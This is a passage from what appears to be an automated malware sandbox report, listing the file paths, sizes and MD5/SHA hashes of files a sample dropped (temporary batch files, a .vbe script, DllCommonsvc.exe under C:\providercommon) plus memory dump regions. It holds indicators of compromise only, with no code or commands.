                                      211a6149f875cdb62642724bacc2c9384afbd306

                                      SHA256

                                      f479d5b25261921211c1e85ac03c9b25e0c1bc81916fc6fdc1ce0252e6b239d3

                                      SHA512

                                      db78cec9bc2f581053fba150ea551eee559b2a7a1e8063a21030345f92392e8c296d0b5783e0c930625882c08241a67323c873d7cd1b59253f41015cd7d423d0

                                    • C:\Users\Admin\AppData\Local\Temp\5irhJyFUC1.bat

                                      Filesize

                                      198B

                                      MD5

                                      cfe48d29734c049e875fa828f707e3b8

                                      SHA1

                                      6ef72abf3e43d8511b53bef6a8868bed6cc1918e

                                      SHA256

                                      3cf1fa12c122151c7fb35f70afe3a79bf981693609a3de6489b0c80d601a8714

                                      SHA512

                                      8e5da1512b9cd809785747b89e0ded44275d045b6eb0b9eb8262e768d52103a50eeb8e30a2f987e05c57ce1e5824922b9fb7be9797aeba7599938192a09c58b5

                                    • C:\Users\Admin\AppData\Local\Temp\6uGRILFBWR.bat

                                      Filesize

                                      198B

                                      MD5

                                      89bb47ee7f2f66151eb006221fd40553

                                      SHA1

                                      45fa90ba9b5ce512ee40dc6f5d4e3447b7f5e6a2

                                      SHA256

                                      ea905b5bae3598a907f4e7f580e1869af2762c54ea4ebc70e4a9eb4163465a32

                                      SHA512

                                      010ac1163a9086755ccb4fd8931b78f2447931d6a5f80ab6ae19e36d45322a00df465c5d702a800e16bcbb73dd9a58a9da81d1d94a3982f0ad0b8352f70c475b

                                    • C:\Users\Admin\AppData\Local\Temp\CabFD06.tmp

                                      Filesize

                                      70KB

                                      MD5

                                      49aebf8cbd62d92ac215b2923fb1b9f5

                                      SHA1

                                      1723be06719828dda65ad804298d0431f6aff976

                                      SHA256

                                      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                      SHA512

                                      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                    • C:\Users\Admin\AppData\Local\Temp\DegeIw2hse.bat

                                      Filesize

                                      198B

                                      MD5

                                      7ed30286968cb5e8088ffbe76e1c6020

                                      SHA1

                                      e20542e759b27efeca59882226b79799daecc92e

                                      SHA256

                                      7196aa0ee110853e9df90fee4b31a51c65c965023b1d45294e1a8f66fd900ccf

                                      SHA512

                                      0248a743d0cf2068bcdc219ffc0041e3998bcc1ab2b4b1b9946b1650d1c0f9bb37fbb326f5464f4d86e8d66b309bdd8333cf36e5e8a89158501167da083c99aa

                                    • C:\Users\Admin\AppData\Local\Temp\TarFD29.tmp

                                      Filesize

                                      181KB

                                      MD5

                                      4ea6026cf93ec6338144661bf1202cd1

                                      SHA1

                                      a1dec9044f750ad887935a01430bf49322fbdcb7

                                      SHA256

                                      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                      SHA512

                                      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                    • C:\Users\Admin\AppData\Local\Temp\cxnNEsMM51.bat

                                      Filesize

                                      198B

                                      MD5

                                      ecb1824ef4ba5db9fa2ed9978a7bd051

                                      SHA1

                                      65caaa725f3f0db3e7abe16a306a7333935dff9a

                                      SHA256

                                      505ed47ee97f418901666e772b4951850987689e8b98eab460770b6b7088ae65

                                      SHA512

                                      6f190cd49187c5c1913a81e82604b7dab18fa4b0b45c4db7b00b5e5c51ce2975c2192dde9ffeb339bc0a2bb3f641dbfc1aebd42aed245106fb8dc652442206b4

                                    • C:\Users\Admin\AppData\Local\Temp\gQkyN2upze.bat

                                      Filesize

                                      198B

                                      MD5

                                      834b8d39b23ac50a474852fdcc5d3238

                                      SHA1

                                      619b3c45fdc02729e1bd764ecc92d043a63043a9

                                      SHA256

                                      1abf2cfc193a7e59ff20a8ebbfb1088cb5b47fc47c7dccc87ea35929c856a9df

                                      SHA512

                                      6833cd772b01f226d1b2fb9afd07158aafbaf695a1a31ad86724345cddc0ee8e799643ea0441e70cc42a85fe79a559d9617b5c4c710fd5d3b5bfff12a175661d

                                    • C:\Users\Admin\AppData\Local\Temp\wHaMzi6eYE.bat

                                      Filesize

                                      198B

                                      MD5

                                      b954daee416bc1556be7e5b41db795ac

                                      SHA1

                                      c5600dac189d9f928ba86467676705e39cafdaff

                                      SHA256

                                      3b092eb3cb258bbefa9035baac597e02f237af3b6e0875f1efe1af879a0ab9f6

                                      SHA512

                                      c274b3cebeb2b450970556899192c22bbfb0a09929d309eab434aa946bf4c5534b6ebef89800f4e645cc497ea90559da22c1b236965c42eb47165f2578ab4024

                                    • C:\Users\Admin\AppData\Local\Temp\wKGJ2NUoAL.bat

                                      Filesize

                                      198B

                                      MD5

                                      afcd8012ca61a9f5a15dcbc3febf821d

                                      SHA1

                                      df2d9efd933eab6c8ceb952bdc4234906c8c6960

                                      SHA256

                                      3a9a9e76683fbe87afe0c6c8aa6a111381e2c6e19a6e90ef354fcf16023244d3

                                      SHA512

                                      0ed21efb19171090e2774dfefa66384a9e776f9b6c0d83b80c43fa8b90b76ee6394bf3dd93c7571269ecdef3dd237d7686d0615cbb16f8080483151d20e031f5

                                    • C:\Users\Admin\AppData\Local\Temp\wRWwqJyPGw.bat

                                      Filesize

                                      198B

                                      MD5

                                      941ae1e29776b5f54c6dd0d4119f06d5

                                      SHA1

                                      f6a0d8d10454ddf31c16a0130fc2ce9501d21390

                                      SHA256

                                      7775e33d350c995b6a59cbe8b30e07df4ce73cb8fed52cc59bdb2862df2d7960

                                      SHA512

                                      e2f8367847df7afb50d9db0cdad02a40824243e1eb8bb1644d4ee94c465dbbd7002516e7bad3448da1590dd3ebeb47ad22813a3ad5f4f23f24bfa8fce7c6c0af

                                    • C:\Users\Admin\AppData\Local\Temp\xjNnGM38uG.bat

                                      Filesize

                                      198B

                                      MD5

                                      6e4a0b8d6bb58cb741fd419f34002c57

                                      SHA1

                                      59866f8de80e2fdd584700a1622bdfad7683dfcd

                                      SHA256

                                      29118e726dfbb88f6dcbbf532841134307e745576c1b903c6213b9ff269e8c9d

                                      SHA512

                                      a4b588e3823cb33f0795c4b199b08be8f082fac01e3ba693c208c980ca535ef8df0bf5ee51ce22db43daddaaa2dcbad8301bb5cfd5de0fc839235131a21fa48a

                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                      Filesize

                                      7KB

                                      MD5

                                      84117d30cfd0c3c2f08d7350c0953943

                                      SHA1

                                      5f756efff97e6be128e3cceedf4e22b5de5e7f76

                                      SHA256

                                      2dd245089b9ce10e019d931764769357dbade809665bb692aeadf60d410d8718

                                      SHA512

                                      29956aec9807296e9f2e30cc46775061fc3a06e8c6d0681b9239ce6219ee82c70abe561ed59bd73ef4c9e6ef9038c7f8eb87553ddaae7450b819e987292b45cd

                                    • C:\providercommon\1zu9dW.bat

                                      Filesize

                                      36B

                                      MD5

                                      6783c3ee07c7d151ceac57f1f9c8bed7

                                      SHA1

                                      17468f98f95bf504cc1f83c49e49a78526b3ea03

                                      SHA256

                                      8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322

                                      SHA512

                                      c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8

                                    • C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe

                                      Filesize

                                      197B

                                      MD5

                                      8088241160261560a02c84025d107592

                                      SHA1

                                      083121f7027557570994c9fc211df61730455bb5

                                      SHA256

                                      2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1

                                      SHA512

                                      20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478

                                    • \providercommon\DllCommonsvc.exe

                                      Filesize

                                      1.0MB

                                      MD5

                                      bd31e94b4143c4ce49c17d3af46bcad0

                                      SHA1

                                      f8c51ff3ff909531d9469d4ba1bbabae101853ff

                                      SHA256

                                      b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

                                      SHA512

                                      f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

                                    • memory/1408-93-0x0000000002860000-0x0000000002868000-memory.dmp

                                      Filesize

                                      32KB

                                    • memory/1472-236-0x0000000000FF0000-0x0000000001100000-memory.dmp

                                      Filesize

                                      1.1MB

                                    • memory/1472-237-0x0000000000260000-0x0000000000272000-memory.dmp

                                      Filesize

                                      72KB

                                    • memory/1524-535-0x00000000008E0000-0x00000000009F0000-memory.dmp

                                      Filesize

                                      1.1MB

                                    • memory/2036-415-0x0000000001170000-0x0000000001280000-memory.dmp

                                      Filesize

                                      1.1MB

                                    • memory/2056-50-0x0000000000D90000-0x0000000000EA0000-memory.dmp

                                      Filesize

                                      1.1MB

                                    • memory/2180-475-0x00000000001F0000-0x0000000000300000-memory.dmp

                                      Filesize

                                      1.1MB

                                    • memory/2204-87-0x000000001B7C0000-0x000000001BAA2000-memory.dmp

                                      Filesize

                                      2.9MB

                                    • memory/2940-15-0x0000000000270000-0x000000000027C000-memory.dmp

                                      Filesize

                                      48KB

                                    • memory/2940-16-0x0000000000260000-0x000000000026C000-memory.dmp

                                      Filesize

                                      48KB

                                    • memory/2940-14-0x0000000000250000-0x0000000000262000-memory.dmp

                                      Filesize

                                      72KB

                                    • memory/2940-13-0x00000000012F0000-0x0000000001400000-memory.dmp

                                      Filesize

                                      1.1MB

                                    • memory/2940-17-0x0000000000580000-0x000000000058C000-memory.dmp

                                      Filesize

                                      48KB

                                    • memory/3000-595-0x0000000000090000-0x00000000001A0000-memory.dmp

                                      Filesize

                                      1.1MB

                                    • memory/3000-596-0x00000000002E0000-0x00000000002F2000-memory.dmp

                                      Filesize

                                      72KB